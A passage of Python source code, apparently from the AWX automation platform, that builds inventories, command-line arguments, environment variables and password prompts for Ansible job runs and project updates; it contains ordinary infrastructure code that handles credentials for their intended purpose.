os.chmod(registries_conf.name, stat.S_IRUSR | stat.S_IWUSR)
lines = [
'[[registry]]',
'location = "{}"'.format(host),
'insecure = true',
]
registries_conf.write('\n'.join(lines))
# Podman >= 3.1.0
env['CONTAINERS_REGISTRIES_CONF'] = registries_conf_path
# Podman < 3.1.0
env['REGISTRIES_CONFIG_PATH'] = registries_conf_path
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
os.makedirs(path, mode=0o700)
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_cwd(self, instance, private_data_dir):
raise NotImplementedError
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# store a record of the venv used at runtime
if hasattr(self.instance, 'custom_virtualenv'):
self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
cwd = self.build_cwd(self.instance, private_data_dir)
res = ansible_runner.interface.run(
project_dir=cwd, event_handler=self.event_handler, finished_callback=self.finished_callback, status_handler=self.status_handler, **params
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack':
env['OS_CLIENT_CONFIG_FILE'] = os.path.join('/runner', os.path.basename(cred_files.get(cloud_cred, '')))
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: again, figure out more elegant way for inside container
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_cwd(self, job, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
